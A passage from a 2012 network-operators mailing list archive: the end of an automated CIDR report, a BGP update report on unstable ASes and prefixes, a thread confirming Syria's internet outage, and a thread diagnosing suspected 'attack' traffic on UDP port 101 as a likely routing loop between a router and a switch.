AS15879 ASN-IS IS Interned Services BV 110.34.44.0/22 AS12653 COMTONET KB Impuls Hellas S.A. 116.206.72.0/24 AS6461 MFNX MFN - Metromedia Fiber Network 116.206.85.0/24 AS6461 MFNX MFN - Metromedia Fiber Network 116.206.103.0/24 AS6461 MFNX MFN - Metromedia Fiber Network 117.120.56.0/21 AS4755 TATACOMM-AS TATA Communications formerly VSNL is Leading ISP 121.46.0.0/16 AS4134 CHINANET-BACKBONE No.31,Jin-rong Street 142.54.0.0/19 AS23498 CDSI - Cogeco Data Services LP 172.14.0.0/24 AS57871 ASTELECENTR TeleCentr Ltd. 172.15.0.0/24 AS57871 ASTELECENTR TeleCentr Ltd. 172.45.1.0/24 AS3356 LEVEL3 Level 3 Communications 172.102.0.0/22 AS4812 CHINANET-SH-AP China Telecom (Group) 172.116.0.0/24 AS7018 ATT-INTERNET4 - AT&T Services, Inc. 172.120.16.0/21 AS19891 BML-AS Bill Me Later, Inc 192.0.0.0/24 AS14745 INTERNAP-BLOCK-4 - Internap Network Services Corporation 198.18.0.0/15 AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation 198.51.100.0/24 AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation 200.1.112.0/24 AS29754 GO2TEL GO2TEL.COM INC. 200.6.49.0/24 AS23148 TERREMARK Terremark 200.24.73.0/24 AS26061 Equant Colombia 200.53.0.0/19 AS13878 Diveo do Brasil Telecomunicacoes Ltda 200.58.248.0/21 AS27849 200.75.184.0/21 AS14754 Telgua 200.106.128.0/20 AS3257 TINET-BACKBONE Tinet SpA 200.115.112.0/20 AS3257 TINET-BACKBONE Tinet SpA 202.1.224.0/24 AS10097 FLOWCOM Flow Communications 2/541 Kent St Sydney NSW 2000 202.8.106.0/24 AS9530 SHINSEGAE-AS SHINSEGAE I&C Co., Ltd. 202.58.113.0/24 AS19161 202.83.120.0/21 AS37972 202.83.124.0/24 AS37972 202.83.125.0/24 AS37972 202.83.126.0/24 AS37972 202.94.1.0/24 AS4808 CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network 202.140.128.0/19 AS9583 SIFY-AS-IN Sify Limited 202.174.125.0/24 AS9498 BBIL-AP BHARTI Airtel Ltd. 202.176.1.0/24 AS9942 COMINDICO-AP SOUL Converged Communications Australia 202.179.134.0/24 AS23966 LDN-AS-PK LINKdotNET Telecom Limited 203.0.113.0/24 AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation 203.23.1.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.24.38.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.30.127.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.32.86.0/23 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.32.86.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.32.87.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.32.188.0/24 AS1221 ASN-TELSTRA Telstra Pty Ltd 203.142.219.0/24 AS45149 204.9.116.0/22 AS30097 NUWAVE - NuWave 204.10.88.0/21 AS3356 LEVEL3 Level 3 Communications 204.10.92.0/23 AS30097 NUWAVE - NuWave 204.10.94.0/23 AS30097 NUWAVE - NuWave 204.14.0.0/21 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 204.14.0.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 204.14.2.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 204.14.3.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 205.175.214.0/24 AS5583 ORANGE-BUSINESS-SERVICES-BENELUX France Telecom S.A. 206.197.184.0/24 AS23304 DATOTEL-STL-AS - Datotel LLC, a NetLabs LLC Company 207.174.131.0/24 AS26116 INDRA - Indra's Net Inc 207.174.132.0/23 AS26116 INDRA - Indra's Net Inc 207.174.152.0/23 AS26116 INDRA - Indra's Net Inc 207.174.154.0/24 AS26116 INDRA - Indra's Net Inc 207.174.155.0/24 AS26116 INDRA - Indra's Net Inc 207.174.200.0/24 AS22658 EARTHNET - Earthnet, Inc. 207.174.248.0/21 AS6653 PRIVATEI - privateI, LLC 207.231.96.0/19 AS11194 NUNETPA - NuNet Inc. 208.83.53.0/24 AS40569 YGOMI-AS - Ygomi LLC 208.93.144.0/21 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 208.93.151.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 209.148.64.0/19 AS13773 TELNETCOMM - Telnet Communications 209.177.64.0/20 AS6461 MFNX MFN - Metromedia Fiber Network 209.213.0.0/20 AS33005 ELTOPIA - Eltopia.com, LLC 213.150.202.0/24 AS8513 SKYVISION SkyVision Global Networks Ltd 213.150.204.0/24 AS29338 AFOL-AS Used by Africaonline Operations 216.12.160.0/20 AS26627 AS-PILOSOFT - Pilosoft, Inc. 216.21.160.0/20 AS27876 American Data Networks 216.155.176.0/20 AS16706 ORTHONE - NORTHEAST ORTHOPAEDIC CLINIC, LLP 216.194.160.0/20 AS27876 American Data Networks Please see http://www.cidr-report.org for the full report ------------------------------------ Copies of this report are mailed to: nanog at nanog.org eof-list at ripe.net apops at apops.net routing-wg at ripe.net afnog at afnog.org From cidr-report at potaroo.net Fri Jul 20 17:04:32 2012 From: cidr-report at potaroo.net (cidr-report at potaroo.net) Date: Fri, 20 Jul 2012 22:04:32 GMT Subject: BGP Update Report Message-ID: <201207202204.q6KM4W3M041420@wattle.apnic.net> BGP Update Report Interval: 14-Jul-12 -to- 16-Jul-12 (2 days) Observation Point: BGP Peering with AS131072 TOP 20 Unstable Origin AS Rank ASN Upds % Upds/Pfx AS-Name 1 - AS17813 8441 1.1% 62.5 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 2 - AS8402 7458 0.9% 4.3 -- CORBINA-AS OJSC "Vimpelcom" 3 - AS6389 6799 0.8% 2.0 -- BELLSOUTH-NET-BLK - BellSouth.net Inc. 4 - AS7029 4412 0.6% 1.3 -- WINDSTREAM - Windstream Communications Inc 5 - AS28573 4308 0.5% 2.1 -- NET Servicos de Comunicao S.A. 6 - AS47931 4294 0.5% 34.9 -- ALENETWORK A.L.E. COM NETWORK S.R.L 7 - AS9829 4175 0.5% 3.2 -- BSNL-NIB National Internet Backbone 8 - AS22561 4072 0.5% 4.0 -- DIGITAL-TELEPORT - Digital Teleport Inc. 9 - AS18566 3937 0.5% 1.9 -- COVAD - Covad Communications Co. 10 - AS1785 3867 0.5% 2.0 -- AS-PAETEC-NET - PaeTec Communications, Inc. 11 - AS27738 3789 0.5% 6.9 -- Ecuadortelecom S.A. 12 - AS8151 3457 0.4% 2.4 -- Uninet S.A. de C.V. 13 - AS17974 3355 0.4% 1.5 -- TELKOMNET-AS2-AP PT Telekomunikasi Indonesia 14 - AS13118 3240 0.4% 67.5 -- ASN-YARTELECOM OJSC Rostelecom 15 - AS24560 3049 0.4% 2.9 -- AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services 16 - AS20115 2973 0.4% 1.8 -- CHARTER-NET-HKY-NC - Charter Communications 17 - AS10620 2846 0.4% 1.4 -- Telmex Colombia S.A. 18 - AS4766 2764 0.3% 1.0 -- KIXS-AS-KR Korea Telecom 19 - AS8452 2604 0.3% 2.2 -- TE-AS TE-AS 20 - AS3356 2474 0.3% 2.2 -- LEVEL3 Level 3 Communications TOP 20 Unstable Origin AS (Updates per announced prefix) Rank ASN Upds % Upds/Pfx AS-Name 1 - AS49745 815 0.1% 815.0 -- ESIH-AS EnergoStroyInvest-Holding JSC 2 - AS43348 1154 0.1% 577.0 -- TATARINOVA-AS PE Tatarinova Alla Ivanovna 3 - AS55665 182 0.0% 182.0 -- STMI-AS-ID PT Sampoerna Telemedia Indonesia 4 - AS33524 149 0.0% 149.0 -- BT-ROC1-AS1 - BlueTie, Inc. 5 - AS3 146 0.0% 759.0 -- J2-GLOBAL-IRELAND j2 Global Ireland Ltd 6 - AS58249 282 0.0% 141.0 -- SKYDRAGONCOMPANYWITHLIMITEDLIABILITY Sky Dragon Company With Limited Liability 7 - AS49072 138 0.0% 138.0 -- APSUARA-AS TCA Apsuara Ltd. 8 - AS37026 395 0.1% 131.7 -- SALT-ASN 9 - AS42806 125 0.0% 125.0 -- TELECOM-AS Telecom Georgia 10 - AS53189 1507 0.2% 115.9 -- 11 - AS42602 112 0.0% 112.0 -- GRANBANK-AS GRAN branch of Joint Stock Commercial Bank INVESTBANK Open-end JSC AS 12 - AS34349 111 0.0% 111.0 -- KUNTSEVONET-AS ZAO Networks Project AS 13 - AS29126 94 0.0% 94.0 -- DATIQ-AS Datiq B.V. 14 - AS54722 92 0.0% 92.0 -- BMOS - Museum of Science 15 - AS29398 83 0.0% 83.0 -- PETROBALTIC "Petrobaltic" S.A. 16 - AS4 308 0.0% 339.0 -- COMUNICALO DE MEXICO S.A. DE C.V 17 - AS50433 74 0.0% 74.0 -- TSPU-AS Tomsk State Pedagogical University 18 - AS10702 2328 0.3% 70.5 -- INL-AS - Idaho National Laboratory 19 - AS19406 752 0.1% 68.4 -- TWRS-MA - Towerstream I, Inc. 20 - AS13118 3240 0.4% 67.5 -- ASN-YARTELECOM OJSC Rostelecom TOP 20 Unstable Prefixes Rank Prefix Upds % Origin AS -- AS Name 1 - 109.161.64.0/19 3149 0.4% AS13118 -- ASN-YARTELECOM OJSC Rostelecom 2 - 98.125.192.0/22 2000 0.2% AS22561 -- DIGITAL-TELEPORT - Digital Teleport Inc. 3 - 59.176.0.0/14 1978 0.2% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 4 - 59.177.0.0/16 1521 0.2% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 5 - 111.125.126.0/24 1519 0.2% AS17639 -- COMCLARK-AS ComClark Network & Technology Corp. 6 - 59.177.0.0/18 1067 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 7 - 59.177.48.0/20 1004 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 8 - 114.143.220.0/24 957 0.1% AS17762 -- HTIL-TTML-IN-AP Tata Teleservices Maharashtra Ltd 9 - 202.56.215.0/24 954 0.1% AS24560 -- AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services 10 - 123.252.208.0/24 852 0.1% AS17762 -- HTIL-TTML-IN-AP Tata Teleservices Maharashtra Ltd 11 - 139.139.19.0/24 837 0.1% AS1562 -- DNIC-ASBLK-01550-01601 - DoD Network Information Center 12 - 194.190.10.0/24 815 0.1% AS49745 -- ESIH-AS EnergoStroyInvest-Holding JSC 13 - 194.63.9.0/24 810 0.1% AS1273 -- CW Cable and Wireless Worldwide plc 14 - 69.38.178.0/24 732 0.1% AS19406 -- TWRS-MA - Towerstream I, Inc. 15 - 59.177.64.0/18 624 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 16 - 94.131.0.0/16 577 0.1% AS43348 -- TATARINOVA-AS PE Tatarinova Alla Ivanovna 17 - 94.130.0.0/16 577 0.1% AS43348 -- TATARINOVA-AS PE Tatarinova Alla Ivanovna 18 - 59.177.0.0/19 561 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 19 - 65.82.30.0/24 536 0.1% AS6197 -- BATI-ATL - BellSouth Network Solutions, Inc 20 - 204.134.161.0/24 530 0.1% AS10702 -- INL-AS - Idaho National Laboratory Details at http://bgpupdates.potaroo.net ------------------------------------ Copies of this report are mailed to: nanog at nanog.org eof-list at ripe.net apops at apops.net routing-wg at ripe.net afnog at afnog.org From graham at apolix.co.za Sat Jul 21 03:06:41 2012 From: graham at apolix.co.za (Graham Beneke) Date: Sat, 21 Jul 2012 10:06:41 +0200 Subject: Hearing Syria internet cut In-Reply-To: References: Message-ID: <500A6311.9010706@apolix.co.za> On 21/07/2012 00:08, James Smith wrote: > I'm curious to know what method people use to monitor the changes in the BGP system? Any recommendations? http://bgpmon.net/ > -----Original Message----- > From: Andree Toonk > Date: Fri, 20 Jul 2012 06:21:21 > To: > Cc: > Subject: Re: Hearing Syria internet cut > > > .-- My secret spy satellite informs me that at 12-07-19 10:00 PM George > Bonser wrote: >> Can anyone confirm? > > Yes confirmed, about 90% of the Syrian prefixes disappeared from the BGP > tables between 13:32 and 14:13 (UTC) earlier today (2012-07-19). -- Graham Beneke From sh.vahabzadeh at gmail.com Sat Jul 21 09:50:32 2012 From: sh.vahabzadeh at gmail.com (Shahab Vahabzadeh) Date: Sat, 21 Jul 2012 19:20:32 +0430 Subject: Attack on UDP 101 Message-ID: Hi there, Does any body know any report about attack on UDP Port 101 which make Layer 3 Loops? This is an example sniff: Source IP Address is : 76.164.199.86 Source port: 62946 Destination port: 101 2012-07-21 11:11:09.646757 Thanks -- Regards, Shahab Vahabzadeh, Network Engineer and System Administrator Cell Phone: +1 (415) 871 0742 PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 BF90 From morrowc.lists at gmail.com Sat Jul 21 12:47:31 2012 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Sat, 21 Jul 2012 13:47:31 -0400 Subject: Attack on UDP 101 In-Reply-To: References: Message-ID: On Sat, Jul 21, 2012 at 10:50 AM, Shahab Vahabzadeh wrote: > 76.164.199.86 is this host perhaps a bcast/network address or routed oddly at the destination? (/32 route to something that is redirecting to another place? or redirecting back toward 0/0?) also: versaweb should fix their rwhois server: Found a referral to rwhois.versaweb.com:4321. PHP Warning: PHP Startup: Unable to load dynamic library '/usr/lib/php/extensions/no-debug-non-zts-20090626/timezonedb.so' - /usr/lib/php/extensions/no-debug-non-zts-20090626/timezonedb.so: cannot open shared object file: No such file or directory in Unknown on line 0 PHP Warning: PHP Startup: Unable to load dynamic library '/usr/lib/php/extensions/no-debug-non-zts-20090626/ixed.5.3.lin' - /usr/lib/php/extensions/no-debug-non-zts-20090626/ixed.5.3.lin: cannot open shared object file: No such file or directory in Unknown on line 0 X-Powered-By: PHP/5.3.8 Set-Cookie: UBERSID=2d6ba57f7921e7694c87b3dfe04eb745; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html; charset=UTF-8 From sh.vahabzadeh at gmail.com Sat Jul 21 12:57:38 2012 From: sh.vahabzadeh at gmail.com (Shahab Vahabzadeh) Date: Sat, 21 Jul 2012 22:27:38 +0430 Subject: Attack on UDP 101 In-Reply-To: References: Message-ID: Dear Christopher, There is no route for this host, but my users connect to this router via virtual-template interface, and in the uplink interface of the same router automatically near 300Mbps traffic is generating (output) and its looping in the same interface (no broadcast in other interfaces). I sniff the traffic on that time with tcpdump I think lots of packets like this, I thought its an attack from one of users because my netflow analyser does not show any record with this IP Address. Do you have any idea? Thanks On Sat, Jul 21, 2012 at 10:17 PM, Christopher Morrow < morrowc.lists at gmail.com> wrote: > On Sat, Jul 21, 2012 at 10:50 AM, Shahab Vahabzadeh > wrote: > > 76.164.199.86 > > is this host perhaps a bcast/network address or routed oddly at the > destination? (/32 route to something that is redirecting to another > place? or redirecting back toward 0/0?) > > also: > versaweb should fix their rwhois server: > Found a referral to rwhois.versaweb.com:4321. > > PHP Warning: PHP Startup: Unable to load dynamic library > '/usr/lib/php/extensions/no-debug-non-zts-20090626/timezonedb.so' - > /usr/lib/php/extensions/no-debug-non-zts-20090626/timezonedb.so: > cannot open shared object file: No such file or directory in Unknown > on line 0 > PHP Warning: PHP Startup: Unable to load dynamic library > '/usr/lib/php/extensions/no-debug-non-zts-20090626/ixed.5.3.lin' - > /usr/lib/php/extensions/no-debug-non-zts-20090626/ixed.5.3.lin: cannot > open shared object file: No such file or directory in Unknown on line > 0 > X-Powered-By: PHP/5.3.8 > Set-Cookie: UBERSID=2d6ba57f7921e7694c87b3dfe04eb745; path=/ > Expires: Thu, 19 Nov 1981 08:52:00 GMT > Cache-Control: no-store, no-cache, must-revalidate, post-check=0, > pre-check=0 > Pragma: no-cache > Content-type: text/html; charset=UTF-8 > -- Regards, Shahab Vahabzadeh, Network Engineer and System Administrator Cell Phone: +1 (415) 871 0742 PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 BF90 From sfouant at shortestpathfirst.net Sat Jul 21 13:32:12 2012 From: sfouant at shortestpathfirst.net (=?utf-8?B?U3RlZmFuIEZvdWFudA==?=) Date: Sat, 21 Jul 2012 14:32:12 -0400 Subject: =?utf-8?B?UmU6IEF0dGFjayBvbiBVRFAgMTAx?= Message-ID: Can you give us more information? What do you mean it is causing Layer 3 loops? Stefan Fouant Sent from my HTC on the Now Network from Sprint! ----- Reply message ----- From: "Shahab Vahabzadeh" Date: Sat, Jul 21, 2012 10:50 am Subject: Attack on UDP 101 To: Hi there, Does any body know any report about attack on UDP Port 101 which make Layer 3 Loops? This is an example sniff: Source IP Address is : 76.164.199.86 Source port: 62946 Destination port: 101 2012-07-21 11:11:09.646757 Thanks -- Regards, Shahab Vahabzadeh, Network Engineer and System Administrator Cell Phone: +1 (415) 871 0742 PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 BF90 From sh.vahabzadeh at gmail.com Sat Jul 21 13:41:05 2012 From: sh.vahabzadeh at gmail.com (Shahab Vahabzadeh) Date: Sat, 21 Jul 2012 23:11:05 +0430 Subject: Attack on UDP 101 In-Reply-To: <500af5b0.26ee440a.3038.ffffab71SMTPIN_ADDED@mx.google.com> References: <500af5b0.26ee440a.3038.ffffab71SMTPIN_ADDED@mx.google.com> Message-ID: Dear Stefan, I have an 7206VXR Router with this design: int gig 0/1: directly connected to 3750 switch (uplink to internet) int gig 0/2: vlan termination from PSTN centers int virtual-template1: xdsl users Its about 4 days that I see near 300Mpbs outbound traffic in int gig0/1 that there is no such a traffic in none of routers interface, but the same traffic is seen in 3750 peer interface. I try to run monitor session on 3750 and monitor port traffic which I see that packet is generating from a user and its in a loop between 3750 and 7206. When I disconnect that user, I see that that packet is in loop again, because of that I am sure its making a loop but I do not know the reseaon is that packets or not. Thanks On Sat, Jul 21, 2012 at 11:02 PM, Stefan Fouant < sfouant at shortestpathfirst.net> wrote: > Can you give us more information? What do you mean it is causing Layer 3 > loops? > > Stefan Fouant > > Sent from my HTC on the Now Network from Sprint! > > > ----- Reply message ----- > From: "Shahab Vahabzadeh" > Date: Sat, Jul 21, 2012 10:50 am > Subject: Attack on UDP 101 > To: > > Hi there, > Does any body know any report about attack on UDP Port 101 which make Layer > 3 Loops? > This is an example sniff: > > Source IP Address is : 76.164.199.86 > Source port: 62946 Destination port: 101 > 2012-07-21 11:11:09.646757 > > Thanks > > -- > Regards, > Shahab Vahabzadeh, Network Engineer and System Administrator > > Cell Phone: +1 (415) 871 0742 > PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 BF90 > > > -- Regards, Shahab Vahabzadeh, Network Engineer and System Administrator Cell Phone: +1 (415) 871 0742 PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 BF90 From swm at emanon.com Sat Jul 21 13:50:06 2012 From: swm at emanon.com (Scott Morris) Date: Sat, 21 Jul 2012 14:50:06 -0400 Subject: Attack on UDP 101 In-Reply-To: References: <500af5b0.26ee440a.3038.ffffab71SMTPIN_ADDED@mx.google.com> Message-ID: <500AF9DE.6040102@emanon.com> A packet doesn't make a loop. A device would create that. So if you are sending the packet out, but something else is sending it back, I'd go take a look at where that's occurring on your devices. If you disconnected the user in question, then what else has either taken over that address, or what device is mistakenly sending things back? Something on your network is making a decision about it, you just need to figure out why. ;) Scott On 7/21/12 2:41 PM, Shahab Vahabzadeh wrote: > Dear Stefan, > I have an 7206VXR Router with this design: > > int gig 0/1: directly connected to 3750 switch (uplink to internet) > int gig 0/2: vlan termination from PSTN centers > int virtual-template1: xdsl users > > Its about 4 days that I see near 300Mpbs outbound traffic in int gig0/1 > that there is no such a traffic in none of routers interface, but the same > traffic is seen in 3750 peer interface. > I try to run monitor session on 3750 and monitor port traffic which I see > that packet is generating from a user and its in a loop between 3750 and > 7206. > When I disconnect that user, I see that that packet is in loop again, > because of that I am sure its making a loop but I do not know the reseaon > is that packets or not. > > Thanks > > > On Sat, Jul 21, 2012 at 11:02 PM, Stefan Fouant < > sfouant at shortestpathfirst.net> wrote: > >> Can you give us more information? What do you mean it is causing Layer 3 >> loops? >> >> Stefan Fouant >> >> Sent from my HTC on the Now Network from Sprint! >> >> >> ----- Reply message ----- >> From: "Shahab Vahabzadeh" >> Date: Sat, Jul 21, 2012 10:50 am >> Subject: Attack on UDP 101 >> To: >> >> Hi there, >> Does any body know any report about attack on UDP Port 101 which make Layer >> 3 Loops? >> This is an example sniff: >> >> Source IP Address is : 76.164.199.86 >> Source port: 62946 Destination port: 101 >> 2012-07-21 11:11:09.646757 >> >> Thanks >> >> -- >> Regards, >> Shahab Vahabzadeh, Network Engineer and System Administrator >> >> Cell Phone: +1 (415) 871 0742 >> PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 BF90 >> >> >> > From morrowc.lists at gmail.com Sat Jul 21 14:03:54 2012 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Sat, 21 Jul 2012 15:03:54 -0400 Subject: Attack on UDP 101 In-Reply-To: References: Message-ID: On Sat, Jul 21, 2012 at 1:57 PM, Shahab Vahabzadeh wrote: > Dear Christopher, > There is no route for this host, but my users connect to this router via $ p 76.164.199.86 PING 76.164.199.86 (76.164.199.86) 56(84) bytes of data. 64 bytes from 76.164.199.86: icmp_seq=1 ttl=250 time=89.9 ms seems like I see one from inside verizon-land... > virtual-template interface, and in the uplink interface of the same router > automatically near 300Mbps traffic is generating (output) and its looping in > the same interface (no broadcast in other interfaces). > I sniff the traffic on that time with tcpdump I think lots of packets like > this, I thought its an attack from one of users because my netflow analyser > does not show any record with this IP Address. > Do you have any idea? some screwball config on your router? or a case where 2 devices have differing ideas of where 0/0 is headed? "Hey, you should know where to send this... no, you should... no, you should.... oops! ttl-expired." > Thanks > > > On Sat, Jul 21, 2012 at 10:17 PM, Christopher Morrow > wrote: >> >> On Sat, Jul 21, 2012 at 10:50 AM, Shahab Vahabzadeh >> wrote: >> > 76.164.199.86 >> >> is this host perhaps a bcast/network address or routed oddly at the >> destination? (/32 route to something that is redirecting to another >> place? or redirecting back toward 0/0?) >> >> also: >> versaweb should fix their rwhois server: >> Found a referral to rwhois.versaweb.com:4321. >> >> PHP Warning: PHP Startup: Unable to load dynamic library >> '/usr/lib/php/extensions/no-debug-non-zts-20090626/timezonedb.so' - >> /usr/lib/php/extensions/no-debug-non-zts-20090626/timezonedb.so: >> cannot open shared object file: No such file or directory in Unknown >> on line 0 >> PHP Warning: PHP Startup: Unable to load dynamic library >> '/usr/lib/php/extensions/no-debug-non-zts-20090626/ixed.5.3.lin' - >> /usr/lib/php/extensions/no-debug-non-zts-20090626/ixed.5.3.lin: cannot >> open shared object file: No such file or directory in Unknown on line >> 0 >> X-Powered-By: PHP/5.3.8 >> Set-Cookie: UBERSID=2d6ba57f7921e7694c87b3dfe04eb745; path=/ >> Expires: Thu, 19 Nov 1981 08:52:00 GMT >> Cache-Control: no-store, no-cache, must-revalidate, post-check=0, >> pre-check=0 >> Pragma: no-cache >> Content-type: text/html; charset=UTF-8 > > > > > -- > Regards, > Shahab Vahabzadeh, Network Engineer and System Administrator > > Cell Phone: +1 (415) 871 0742 > PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 BF90 > From morrowc.lists at gmail.com Sat Jul 21 14:08:04 2012 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Sat, 21 Jul 2012 15:08:04 -0400 Subject: Attack on UDP 101 In-Reply-To: References: <500af5b0.26ee440a.3038.ffffab71SMTPIN_ADDED@mx.google.com> Message-ID: On Sat, Jul 21, 2012 at 2:41 PM, Shahab Vahabzadeh wrote: > Dear Stefan, > I have an 7206VXR Router with this design: > > int gig 0/1: directly connected to 3750 switch (uplink to internet) > int gig 0/2: vlan termination from PSTN centers > int virtual-template1: xdsl users > > Its about 4 days that I see near 300Mpbs outbound traffic in int gig0/1 > that there is no such a traffic in none of routers interface, but the same > traffic is seen in 3750 peer interface. > I try to run monitor session on 3750 and monitor port traffic which I see > that packet is generating from a user and its in a loop between 3750 and > 7206. I suspect that the 7206 and 3750 both thing the other guy has default... and with no more specific to follow the packet just pingpongs between the 2 devices. I would also suspect you see this for more than one destination :( picking just one entry (last entry I see) from route-views.routeviews.org: BGP routing table entry for 76.164.192.0/19, version 708055091 Paths: (35 available, best #31, table Default-IP-Routing-Table) ... 4436 6939 53340 36114 69.31.111.244 from 69.31.111.244 (69.31.111.244) Origin IGP, metric 0, localpref 100, valid, external Community: 4436:21216 all of 36114(versaweb) traffic would seem to head through 53340(vegasnap) on the way home, so... maybe something else is going on like you didn't accept transit routes (or send them or something else) from your transit? hard to say with as little info as we see here, but :) > When I disconnect that user, I see that that packet is in loop again, > because of that I am sure its making a loop but I do not know the reseaon > is that packets or not. > > Thanks > > > On Sat, Jul 21, 2012 at 11:02 PM, Stefan Fouant < > sfouant at shortestpathfirst.net> wrote: > >> Can you give us more information? What do you mean it is causing Layer 3 >> loops? >> >> Stefan Fouant >> >> Sent from my HTC on the Now Network from Sprint! >> >> >> ----- Reply message ----- >> From: "Shahab Vahabzadeh" >> Date: Sat, Jul 21, 2012 10:50 am >> Subject: Attack on UDP 101 >> To: >> >> Hi there, >> Does any body know any report about attack on UDP Port 101 which make Layer >> 3 Loops? >> This is an example sniff: >> >> Source IP Address is : 76.164.199.86 >> Source port: 62946 Destination port: 101 >> 2012-07-21 11:11:09.646757 >> >> Thanks >> >> -- >> Regards, >> Shahab Vahabzadeh, Network Engineer and System Administrator >> >> Cell Phone: +1 (415) 871 0742 >> PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 BF90 >> >> >> > > > -- > Regards, > Shahab Vahabzadeh, Network Engineer and System Administrator > > Cell Phone: +1 (415) 871 0742 > PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 BF90 From sh.vahabzadeh at gmail.com Sat Jul 21 14:12:39 2012 From: sh.vahabzadeh at gmail.com (Shahab Vahabzadeh) Date: Sat, 21 Jul 2012 23:42:39 +0430 Subject: Attack on UDP 101 In-Reply-To: References: <500af5b0.26ee440a.3038.ffffab71SMTPIN_ADDED@mx.google.com> Message-ID: Can hardware problem make something happen? On Sat, Jul 21, 2012 at 11:38 PM, Christopher Morrow < morrowc.lists at gmail.com> wrote: > On Sat, Jul 21, 2012 at 2:41 PM, Shahab Vahabzadeh > wrote: > > Dear Stefan, > > I have an 7206VXR Router with this design: > > > > int gig 0/1: directly connected to 3750 switch (uplink to internet) > > int gig 0/2: vlan termination from PSTN centers > > int virtual-template1: xdsl users > > > > Its about 4 days that I see near 300Mpbs outbound traffic in int gig0/1 > > that there is no such a traffic in none of routers interface, but the > same > > traffic is seen in 3750 peer interface. > > I try to run monitor session on 3750 and monitor port traffic which I see > > that packet is generating from a user and its in a loop between 3750 and > > 7206. > > I suspect that the 7206 and 3750 both thing the other guy has > default... and with no more specific to follow the packet just > pingpongs between the 2 devices. I would also suspect you see this for > more than one destination :( > > picking just one entry (last entry I see) from route-views.routeviews.org: > BGP routing table entry for 76.164.192.0/19, version 708055091 > Paths: (35 available, best #31, table Default-IP-Routing-Table) > ... > 4436 6939 53340 36114 > 69.31.111.244 from 69.31.111.244 (69.31.111.244) > Origin IGP, metric 0, localpref 100, valid, external > Community: 4436:21216 > > all of 36114(versaweb) traffic would seem to head through > 53340(vegasnap) on the way home, so... maybe something else is going > on like you didn't accept transit routes (or send them or something > else) from your transit? hard to say with as little info as we see > here, but :) > > > When I disconnect that user, I see that that packet is in loop again, > > because of that I am sure its making a loop but I do not know the reseaon > > is that packets or not. > > > > Thanks > > > > > > On Sat, Jul 21, 2012 at 11:02 PM, Stefan Fouant < > > sfouant at shortestpathfirst.net> wrote: > > > >> Can you give us more information? What do you mean it is causing Layer > 3 > >> loops? > >> > >> Stefan Fouant > >> > >> Sent from my HTC on the Now Network from Sprint! > >> > >> > >> ----- Reply message ----- > >> From: "Shahab Vahabzadeh" > >> Date: Sat, Jul 21, 2012 10:50 am > >> Subject: Attack on UDP 101 > >> To: > >> > >> Hi there, > >> Does any body know any report about attack on UDP Port 101 which make > Layer > >> 3 Loops? > >> This is an example sniff: > >> > >> Source IP Address is : 76.164.199.86 > >> Source port: 62946 Destination port: 101 > >> 2012-07-21 11:11:09.646757 > >> > >> Thanks > >> > >> -- > >> Regards, > >> Shahab Vahabzadeh, Network Engineer and System Administrator > >> > >> Cell Phone: +1 (415) 871 0742 > >> PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 BF90 > >> > >> > >> > > > > > > -- > > Regards, > > Shahab Vahabzadeh, Network Engineer and System Administrator > > > > Cell Phone: +1 (415) 871 0742 > > PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 BF90 > -- Regards, Shahab Vahabzadeh, Network Engineer and System Administrator Cell Phone: +1 (415) 871 0742 PGP Key Fingerprint = 8E34 B335 D702 0CA7 5A81 C2EE 76A2 46C2 5367 BF90 From morrowc.lists at gmail.com Sat Jul 21 15:53:38 2012 From: morrowc.lists at gmail.com (Christopher Morrow) Date: 